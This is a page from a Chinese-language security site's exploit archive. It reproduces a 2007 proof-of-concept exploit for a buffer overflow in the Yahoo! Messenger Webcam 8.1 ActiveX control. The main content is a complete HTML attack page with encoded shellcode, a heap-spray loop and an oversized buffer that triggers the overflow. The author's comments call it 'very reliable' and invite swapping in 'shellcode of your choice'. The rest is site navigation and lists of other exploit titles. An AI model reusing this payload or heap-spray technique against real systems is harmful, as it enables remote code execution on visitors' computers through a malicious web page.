首頁 | 安全文章 | 安全工具 | Exploits | 本站原創 | 關于我們 | 網站地圖 | 安全論壇
  當前位置:主頁>安全文章>文章資料>Exploits>文章內容
Yahoo! Messenger Webcam 8.1 ActiveX Remote Buffer Overflow Exploit
來源:www.hlzgit.live 作者:Danny 發布時間:2007-06-08  
<html>
<!--
45 minutes of fuzzing!
Great results! very relible, runs calc.exe, replace with shellcode of your choice!!!

link:http://www.informationweek.com/news/showArticle.jhtml?articleID=199901856
maybe more vulz!

Greetz to: str0ke and shinnai!
-->
<html>
<object classid='clsid:DCE2F8B1-A520-11D4-8FD0-00D0B7730277' id='target'></object>
<script>
shellcode = unescape("%u9090%u9090%u9090%uC929%uE983%uD9DB%uD9EE%u2474" +
"%u5BF4%u7381%uA913%u4A67%u83CC%uFCEB%uF4E2%u8F55" +
"%uCC0C%u67A9%u89C1%uEC95%uC936%u66D1%u47A5%u7FE6" +
"%u93C1%u6689%u2FA1%u2E87%uF8C1%u6622%uFDA4%uFE69" +
"%u48E6%u1369%u0D4D%u6A63%u0E4B%u9342%u9871%u638D" +
"%u2F3F%u3822%uCD6E%u0142%uC0C1%uECE2%uD015%u8CA8" +
"%uD0C1%u6622%u45A1%u43F5%u0F4E%uA798%u472E%u57E9" +
"%u0CCF%u68D1%u8CC1%uECA5%uD03A%uEC04%uC422%u6C40" +
"%uCC4A%uECA9%uF80A%u1BAC%uCC4A%uECA9%uF022%u56F6" +
"%uACBC%u8CFF%uA447%uBFD7%uBFA8%uFFC1%u46B4%u30A7" +
"%u2BB5%u8941%u33B5%u0456%uA02B%u49CA%uB42F%u67CC" +
"%uCC4A%uD0FF");   
bigblock = unescape("%u9090%u9090");
headersize = 20;
slackspace = headersize+shellcode.length
while (bigblock.length<slackspace) bigblock+=bigblock;
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
while(block.length+slackspace<0x40000) block = block+block+fillblock;
memory = new Array();
for (x=0; x<800; x++) memory[x] = block + shellcode;
var buffer = '\x0a';
while (buffer.length < 5000) buffer+='\x0a\x0a\x0a\x0a';
target.server = buffer;
target.initialize();
target.send();
</script>
</html>
sometimes 0a0a0a0a0a is not as good as 0d0d0d0d or 11111111

 
[推薦] [評論(0條)] [返回頂部] [打印本頁] [關閉窗口]  
匿名評論
評論內容:(不能超過250字,需審核后才會公布,請自覺遵守互聯網相關政策法規。
 §最新評論:
  熱點文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·VideoScript 3.0 <= 4.0.1.50 Of
·HT Editor File openning Stack
  相關文章
·NewsSync for phpBB 1.5.0rc6 Re
·Yahoo! Messenger Webcam 8.1 Ac
·Wordpress 2.2 (xmlrpc.php) Rem
·Microsoft Windows Animated Cur
·DRDoS - Distributed Reflection
·Zenturi ProgramChecker ActiveX
·Comicsense 0.2 (index.php epi)
·MoviePlay 4.76 .lst File Local
·PBLang <= 4.67.16.a Remote Cod
·Yahoo! Messenger Webcam 8.1 (Y
·Yahoo! Messenger Webcam 8.1 (Y
·SNMPc <= 7.0.18 Remote Denial
  推薦廣告
CopyRight © 2002-2019 VFocuS.Net All Rights Reserved
期本期特码